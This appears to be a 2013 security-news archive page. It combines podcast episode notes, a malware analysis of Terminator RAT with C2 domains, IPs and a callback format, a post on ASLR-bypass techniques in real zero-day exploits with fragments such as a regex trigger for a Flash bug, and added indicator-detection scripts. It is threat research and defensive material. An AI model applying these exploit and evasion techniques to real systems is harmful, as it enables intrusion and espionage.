Monthly Archives: October 2013

SCADA: Attack & Defense: Securing Critical Infrastructure – Episode 350, Part 2 – October 25, 2013

SCADA systems are being attacked and making headlines. However, this is not news, or is it? There is a lot of newfound "buzz" around attacking SCADA and defending SCADA. Technology has evolved and many systems are Internet connected and more advanced than ever. Water, power, electric, manufacturing all have SCADA.

Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing.

Joel Langill is the SCADAhacker. His expertise was developed over nearly 30 years through in-depth, comprehensive industrial control systems architecture, product development, implementation, upgrade and remediation in a variety of roles covering manufacturing of consumer products, oil and gas including petroleum refining, automation solution sales and development, and system engineering.

Dale Peterson is the founder and CEO of Digital Bond, a control system consulting and research practice. He performed his first SCADA assessment in 2000, and Dale is the program chair for the S4 conference every January in Miami Beach.

Patrick Miller provides services as an independent security and regulatory advisor for the Critical Infrastructure sectors as Partner and Managing Principal of the Anfield Group.

Support Wounded Warriors, Active Defense: Taking The Fight To Attackers: Should We? – Episode 350, Part 1 – October 25, 2013

Welcome to our very special episode 350! We have a very special episode, all in support of wounded veterans in our armed services. Please take the time to donate using the links above. We've got an epic day in store for you, including contests, panel discussions, technical segments and more!

Active Defense: Taking The Fight To Attackers: Should We?

We've all heard the term "Hacking Back". We all have mixed feelings about this term. Let's be clear, it's not about feelings! The revenge-based "hacking back" was doomed to failure from the beginning. On the flip side, we're losing the battle against attackers on many fronts. What can we do? Setting traps, tracking attackers, luring them into areas of the network and systems deemed "honeypots" is on the table, or is it? What are the legal ramifications of this activity?

Benjamin Wright is the author of several technology law books, including Business Law and Computer Security, published by the SANS Institute. With over 25 years in private law practice, he has advised many organizations, large and small, private sector and public sector, on privacy, computer security, e-mail discovery, outsourcing contracts and records management. Nothing Mr. Wright says in public is legal advice for your particular situation. If you need legal advice or a legal opinion, you should retain a lawyer.

Joshua Corman is the Director of Security Intelligence for Akamai. Mr. Corman’s cross-domain research highlights adversaries, game theory and motivational structures. His analysis cuts across sectors to the core security challenges plaguing the IT industry, and helps to drive evolutionary strategies toward emerging technologies and shifting incentives.

Dave Dittrich is an Affiliated Research Scientist with the Office of the Chief Information Security Officer at the University of Washington. He is also a member of the Honeynet Project and Seattle's "Agora" computer security group.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WW-II codebreaker. His first IDS was written more than 10 years ago designed to catch Morris-worm copycats.

Evasive Tactics: Terminator RAT

FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

  • It evades sandbox analysis by terminating and removing itself (DW20.exe) after installation. Malicious behavior appears only after a reboot.
  • It deters single-object sandboxes by splitting roles between collaborating components: the RAT (svchost_.exe) works with its relay (sss.exe) to communicate with the command and control server.
  • It deters forensic investigation by changing the startup folder location.
  • It deters file-based scanners that apply a maximum file size filter by expanding svchost_.exe to 40MB.

The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety of (possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

These modifications appear to be an attempt to evade network defenses, perhaps in response to defenders’ increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

[Figure 1]

1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)

DW20.exe was found to be the installation executable file. It first creates its working folders at “%UserProfile%\Microsoft” and “%AppData%\2019”. The former is used to store the configurations and executable files (svchost_.exe and sss.exe) and the latter is used to store the shortcut link files. The “2019” folder is then configured as the new startup folder location by setting the registry value “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup” to its path (see Figure 2).

[Figure 2]

The executable file “sss.exe” was found to be the decrypted form of the resource named 140 with type “ACCELORATOR” (likely a misspelling of Accelerator; see Figure 3). This resource was decrypted using a customized XTEA algorithm and appended with an encrypted configuration for the domains and ports.

[Figure 3]

After installation, DW20.exe terminates and deletes itself. The malware components run only after a reboot. This is an effective way to evade automated sandbox analysis, as the malicious activity is revealed only after a reboot.

2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)

sss.exe is an interesting malware component. If a researcher analyzes it on its own, it is not considered a malicious program. This component acts as a network relay between the malware and the proxy server, listening on port 8000. To achieve this, it first tries to identify the list of proxy servers used on the system by calling “WinHttpGetIEProxyConfigForCurrentUser”, and the discovered proxy servers and related ports are stored in the same directory in a file named “PROXY” (see Figure 4).

[Figure 4]

When there is a new incoming TCP connection over port 8000, it will attempt to create a local to proxy socket connection. With that, it will check connectivity with the CnC server. If the response is 200, it will then start to create a “relay link” between the malware and the CnC server (see Figure 5). The “relay link” was created using two threads, where one thread will transfer data from socket 1 to socket 2 (see Figure 6) and the other will do vice versa.

[Figure 5]

[Figure 6]

As depicted in Figure 7, the user agent is hard coded. This offers a possible means of identifying potentially malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE 6.0.1.3” is not a valid version token.

[Figure 7]

The configurations for the malicious domains and ports to use are located in the last 188 bytes of the executable file (see Figure 8). The first 16 bytes are the key (boxed in red) used to decrypt the remaining content with a modified XTEA algorithm (see Figure 9). The two malicious domains found were “liumingzhen.zapto.org” and “liumingzhen.myftp.org”.

[Figure 8]

[Figure 9]

3.   Network Traffic

The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7) was not configured with fake HTML, Yahoo Messenger, or Windows Messenger traffic header as it had in past variants. However, the content is encrypted in exactly the same way as previous versions of Terminator RAT.

[Figure 10]

The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

[Figure 11]

This particular sample is configured to one of two command and control servers:

  • liumingzhen.zapto.org / 123.51.208.69
  • liumingzhen.myftp.org / 123.51.208.69

We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

[Figure 12]

The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

  • catlovers.25u.com  / 123.51.208.142

The command and control servers for both samples resolved to IP addresses in the same class C network.

4.   Campaign Connections

In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

[Figure 13]

The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158); however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server, liumingzhen.zapto.org, but the callback is quite different:

XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$

In a separate case where liumingzhen.zapto.org has been used as the command and control server, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.

Conclusion

Terminator RAT is an example of how malware is becoming increasingly sophisticated and harder to detect. There is a need for continual research to understand the various techniques, tactics, and procedures used by adversaries. Detection of exploitation and identification of anomalous callbacks are becoming extremely critical in preventing the malware from installing onto the system or phoning back to the command and control servers.
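
The callback indicators described in this post (the invalid “MSIE 6.0.1.3” version token, the listed command and control hosts and IPs, and the WinData callback URI) can be checked against proxy logs. The following is an added example, not code from the original post; the log layout, function names, and sample lines are constructed for illustration, and the full user-agent strings are built around the token quoted above because Figure 7 is not reproduced here.

```python
import re

# Indicators quoted in the post above.
C2_HOSTS = {"liumingzhen.zapto.org", "liumingzhen.myftp.org", "catlovers.25u.com"}
C2_IPS = {"123.51.208.69", "123.51.208.142"}
# WinData callback path as shown in the post: "/WinData.DLL?HELO-STX-..."
WINDATA_URI = re.compile(r"^/WinData\.DLL\?HELO-STX-", re.IGNORECASE)

# Genuine MSIE tokens are "major.minor" with an optional beta letter
# (e.g. "MSIE 6.0", "MSIE 7.0b"); "MSIE 6.0.1.3" has too many components.
MSIE_TOKEN = re.compile(r"MSIE\s+([^;)\s]+)")
VALID_MSIE_VERSION = re.compile(r"^\d{1,2}\.\d{1,2}[a-z]?$")

# Assumed (hypothetical) log layout: timestamp client method host uri "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<host>\S+) (?P<uri>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '2013-10-24T09:12:01Z 10.0.0.21 GET www.example.com /index.html '
    '"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"',
    '2013-10-24T09:14:30Z 10.0.0.37 GET liumingzhen.zapto.org:443 / '
    '"Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.1)"',
    '2013-10-24T09:15:02Z 10.0.0.37 GET LIUMINGZHEN.MYFTP.ORG. / '
    '"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"',
    '2013-10-24T09:20:44Z 10.0.0.52 XYZ 123.51.208.69 '
    '/WinData.DLL?HELO-STX-1*110.0.0.52*WS-0052*0605[MAC:00-00-5E-00-53-01]$ "-"',
    '2013-10-24T09:25:10Z 10.0.0.60 GET intranet.example.com /app '
    '"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"',
    '2013-10-24T09:31:00Z 10.0.0.61 GET',
]


def normalize_host(host):
    """Lowercase, drop an explicit port and a trailing dot before comparing."""
    host = re.sub(r":\d+$", "", host.strip().lower())
    return host.rstrip(".")


def classify(record):
    """Return the list of indicator names that one parsed log record matches."""
    reasons = []
    host = normalize_host(record["host"])
    if host in C2_HOSTS:
        reasons.append("c2_host")
    if host in C2_IPS:
        reasons.append("c2_ip")
    if WINDATA_URI.match(record["uri"]):
        reasons.append("windata_callback")
    for version in MSIE_TOKEN.findall(record["ua"]):
        if not VALID_MSIE_VERSION.match(version):
            reasons.append("malformed_msie_token")
            break
    return reasons


def scan(lines):
    """Return (hits, unparsed): hits are (line number, client, reasons) tuples."""
    hits, unparsed = [], []
    for lineno, line in enumerate(lines, start=1):
        match = LOG_LINE.match(line.strip())
        if match is None:
            # Surface lines the parser could not read instead of dropping them.
            unparsed.append(lineno)
            continue
        reasons = classify(match.groupdict())
        if reasons:
            hits.append((lineno, match["src"], reasons))
    return hits, unparsed


if __name__ == "__main__":
    found, skipped = scan(SAMPLE_LOG)
    for lineno, src, reasons in found:
        print(f"line {lineno}: client {src} matched {', '.join(reasons)}")
    print(f"unparsed lines: {skipped}")
```

The user-agent rule keys on the malformed version token rather than on the domains, so it still fires if the relay is pointed at infrastructure that is not on the list.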

 

Update: Ad Vulna Continues

This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

Since our last notification to Google and Ad Vulna (code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the ad library included in the app to the newest version, which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often and older versions of Android do not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest version of the apps.

From our current analysis, there are still many other apps using the vulnaggressive versions of the ad library Ad Vulna on Google Play, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

Heather Mahalik on Smartphone Forensics Course, Drunken Security News – Episode 348 – October 10, 2013

This segment was broken in two parts as the technical segment with Heather Mahalik happened in the middle of it. Heather is a senior digital forensics analyst at Basis Technology. As the on-site project manager, she uses her experience to manage the cell phone exploitation team and supports media and cell phone forensics efforts in the U.S. government. Heather is a certified SANS instructor and teaching the upcoming course Advanced Smartphone and Mobile Device Forensics.

Ok, on to the stories of the week with Paul, Larry, Allison and Jack. What'd you do this summer? Disney? Six Flags? Big Data Land? After much chatter in the Twittersphere (logged here by Space Rogue) last week, Jack brings up the "Popping Penguins" article from Forbes. The article talks about this super vulnerable program that is going to be the downfall of Linux. It's called bash. Would you believe you can use bash to start a listener on your machine and then send some commands over telnet to have someone else's machine connect back to you? Uh oh. Also, beware of another application, one that runs from the desktop that lets you connect to other computers and pull down files from a machine you don't own. Yeah, that one's called a browser. Sounds equally dangerous, no? Should we uninstall bash as a security measure?

Larry threw out there an article on 5 WiFi security myths to abandon. But Larry mentioned that some of these might not actually be very new. Things like don't hide the SSID, as some newer systems will see it anyway and digging deeper to find the SSID isn't that hard. Plus, if its owner took the steps to hide it, wouldn't that pique your interest that there may be something good running there? Sending out a weak signal may sound like a good idea, as if someone can't reach it, they can't connect to it, right? But all that does is annoy its intended users, and if someone really wants to get on the network, they'll simply use an antenna. The article ends with the non-myth that if you truly want WiFi security, make sure you use good encryption and a strong password. Simple, eh?

Jack was looking forward to going on a good patch rant. He and Paul have done webinars about really stretching things and getting your patch cycle down to five days from the day of release. Jack said during the good old days, he'd challenge himself to getting his systems patched within 72 hours. Patch Tuesday was to be completed by Friday. In this article by Dr. Anton Chuvakin, he does indicate how it would be good for some big corporations to get their patch cycle down from 90 days to 30 days, but then argues if the bad guys only need 3, then what's the point of all that effort? Jack's feeling is that even the 30 days should be enough in many cases, but it's often politics and other "can't do" attitudes that prevent it from happening. Why is that? Get those patches in place people!

One quick note on a tangent the team went off on. In their experience as pentesters, Larry and Paul mention that all too often the way they end up pwning a system is through some machine that no one knew was running, with services that no one knew were running, with an account that no one knows why it still exists. Do you have a good inventory of where your data is? What machines are in your data center? What services and accounts are on each? If those are gold to a pentester, who has to respect a customer's defined scope, guess what a malicious user is going to do to your network.

Paul's looking for advice on what new phone he should get? Android? iPhone? What say you? Tweet him up with your suggestion at @securityweekly.

Remember that Yahoo bug bounty program? $12.50 credit toward the Yahoo store? A little update on the rants and ridicule from last week: it was actually one guy, Ramses Martinez, Director, Yahoo Paranoids, who was very appreciative of people reporting bugs and was paying them out of pocket. He would send researchers a Yahoo t-shirt but would then find out the recipient already had multiple Yahoo shirts. Martinez's idea then was to give the reporter a credit in the Yahoo store matching the value of the shirt, out of his own pocket. Since the uproar, Yahoo has installed its own bug bounty program and Martinez is no longer paying for the reports himself. Good on ya, Yahoo and even better, thank you Ramses Martinez for caring about security.

Speaking of bug bounties, Google has started a bug bounty program for open source software. Repeat that, it's not just Google software that they're paying bounties for, it's software that there really is no organization behind and normally count on volunteers to fix things. Now Google is putting their money behind that effort. As Allison mentions, there hasn't ever been any motivation for anyone to report bugs and now there is.

Paunch, the alleged author of the Blackhole exploit kit was arrested in Russia last week. Or at least we think so. Some unconfirmed reports have indicated this and Blackhole has not been updated since this time. Or maybe the guy just decided to take an extended vacation and threw the story out there himself. Either way, it might be time for Evil Bob to find a new exploit kit. (Note: Erik Estrada is not "Paunch", he's Ponch, as in Frank Poncharello)

Microsoft has a new disk cleanup that removes all the old and outdated updates. Jack gained more than 6 GB of space after running the cleanup, but a word of caution: it takes a concerningly long time for the next reboot. You might think you killed your computer but no, it really does take that long.

Check out "Tails" a security and privacy distribution and let us know what you think. Is it good? What makes it a better choice than some others? Though the number of security updates in recent versions is a little concerning. Yeah, I get it that it's good that security holes are fixed and that it's to software that the distro is including. But it's just a little concerning when you pitch it as being for security and privacy yet there are piles of security updates. It makes me wonder just how secure it is and whether it's any better than a secure version of your favorite distribution anyway. But you can certainly let me know and I'll post some comments from you in upcoming week. Tweet me at @plaverty9

There was also some discussion on iOS7 image identification, Larry has a colleague at Inguardians who wrote up an intro to using rfcat and Jack suggests taking a deeper look for yourself before jumping into the patch for MS13-81 and whether your system needs it. If it does, test thoroughly. It's got some deep stuff on it.

Interview with Thierry Zoller – Episode 348 – October 10, 2013

Thierry has 14 years of experience in information security, designing resistant architectures and systems, managing development and information security teams, ISM policies and high profile penetration tests. Thierry has a security blog over at blog.zoller.lu. Thierry is currently working as a Practice Lead for Threat and Vulnerability Management at Verizon Business.

Our Local Security Meet [19th October 2013] – Bangalore

Talks: 09:30 – 10:00:  WebSockets for Beginners – Prasanna K WebSockets is definitely one of the brighter features of HTML5. It allows for easy and efficient real-time communication with the server. It’s very useful when you’re developing an interactive application like chat, game, real time reporting system etc. From a security standpoint there are many […]

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operating systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL: JRE 1.6.x ships an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped with MS Office 2010/2007, is not compiled with ASLR. This technique was first described here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792.

Limitations

The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.
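
Whether a given DLL was linked with /DYNAMICBASE can be read from the DllCharacteristics field of its PE optional header. The following is an added example for auditing modules, not code from the original post; the function names and the sample headers it builds are constructed for illustration, and it also reports the NX-compatible (DEP) flag.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # set by /DYNAMICBASE (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # set by /NXCOMPAT (DEP)

COFF_HEADER_SIZE = 20
DLLCHARACTERISTICS_OFFSET = 70   # same offset in PE32 and PE32+ optional headers


def read_dll_characteristics(data):
    """Return the DllCharacteristics word of a PE image given as bytes."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + COFF_HEADER_SIZE
    if len(data) < opt + DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header truncated")
    (size_of_optional,) = struct.unpack_from("<H", data, e_lfanew + 4 + 16)
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B) or size_of_optional < DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("unsupported optional header")
    (flags,) = struct.unpack_from("<H", data, opt + DLLCHARACTERISTICS_OFFSET)
    return flags


def missing_mitigations(data):
    """List the mitigation flags that are NOT set in the image."""
    flags = read_dll_characteristics(data)
    missing = []
    if not flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE:
        missing.append("DYNAMIC_BASE")
    if not flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        missing.append("NX_COMPAT")
    return missing


def audit_modules(modules):
    """Map module name -> missing flags (or UNPARSEABLE) for modules with findings."""
    findings = {}
    for name, data in modules.items():
        try:
            missing = missing_mitigations(data)
        except ValueError:
            missing = ["UNPARSEABLE"]
        if missing:
            findings[name] = missing
    return findings


def build_sample_pe(dll_characteristics, pe32_plus=False):
    """Construct a header-only PE stub for the demo (constructed data, not a real DLL)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header follows
    opt_size = 240 if pe32_plus else 224
    machine = 0x8664 if pe32_plus else 0x014C
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x2002)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32_plus else 0x10B)
    struct.pack_into("<H", opt, DLLCHARACTERISTICS_OFFSET, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed samples with hypothetical names.
SAMPLES = {
    "sample_fixed_base.dll": build_sample_pe(0x0000),
    "sample_aslr_only.dll": build_sample_pe(0x0040),
    "sample_hardened.dll": build_sample_pe(0x0140, pe32_plus=True),
    "not_a_pe.bin": b"plain text",
}

if __name__ == "__main__":
    for name, missing in sorted(audit_modules(SAMPLES).items()):
        print(f"{name}: missing {', '.join(missing)}")
```

To audit real files, pass `{path: open(path, "rb").read()}` for each module loaded by the browser process; any module reported as missing DYNAMIC_BASE loads at a predictable address.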

Modify the BSTR length/null terminator

This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.

CVE-2013-0640

The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:

[image]

Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up from the immunityinc’s blog.

Limitations

This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even better, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

Here is the list of known zero-day exploits using this technique:

CVE-2013-0634

This exploit involves a buffer overflow in Adobe Flash Player regex handling. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get the base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a continuous memory layout by allocating the following objects: [image]
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.

CVE-2013-3163

This vulnerability involves an IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows: [image]
  2. After the spray, those objects are stored aligned in a stable memory address. For example: [image]

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code.

  3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0. [image]
  5. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows: [image]

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search for the sound object in memory and overwrite its vftable to point to the ROP payload and shellcode.

CVE-2013-1690

The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:

[image]

In the above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside setImageAnimationMode(), the code looks like the following:

[image]

In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.

[image]

After triggering the vulnerability, the attacker increases the size of the array to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read from or write to memory with the corrupted ArrayBuffer. In this case, the attacker chose to disclose the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.

CVE-2013-1493

This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.

Summary

The following table outlines recent APT zero-day exploits and what bypass techniques they used:

[image]

Conclusion

ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLLs to bypass it, and Microsoft has also added mitigations in its latest OS and browser to prevent use of non-ASLR modules to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use more advanced exploit techniques. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Episode #171: Flexibly Finding Firewall Phrases

Old Tim answers an old email

Patrick Hoerter writes in:
I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only the configuration items that are in some way tied to a specific port, in this case "port10".

Sample Data:

edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "192.168.0.0"
set subnet 192.168.0.0 255.255.0.0
next
edit "10.0.0.0"
set subnet 10.0.0.0 255.0.0.0
next
edit "172.16.0.0"
set subnet 172.16.0.0 255.240.0.0
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
set subnet 10.254.154.0 255.255.255.0
next
edit "vpn-CandC-3"
set associated-interface "port10"
set subnet 10.254.155.0 255.255.255.0
next
edit 92
set srcintf "port10"
set dstintf "port1"
set srcaddr "vpn-CandC-1" "vpn-CandC-2" "vpn-CandC-3"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic enable
next

Sample Results:

edit "port10"
set vdom "root"
set ip 192.168.1.54 255.255.255.248
set allowaccess ping
set type physical
set sample-rate 400
set description "Other Firewall"
set alias "fw-outside"
set sflow-sampler enable
next
edit "vpn-CandC-1"
set associated-interface "port10"
set subnet 10.254.153.0 255.255.255.0
next
edit "vpn-CandC-2"
set associated-interface "port10"
set subnet 10.254.154.0 255.255.255.0
next
edit "vpn-CandC-3"
set associated-interface "port10"
set subnet 10.254.155.0 255.255.255.0
next
edit 92
set srcintf "port10"
set dstintf "port1"
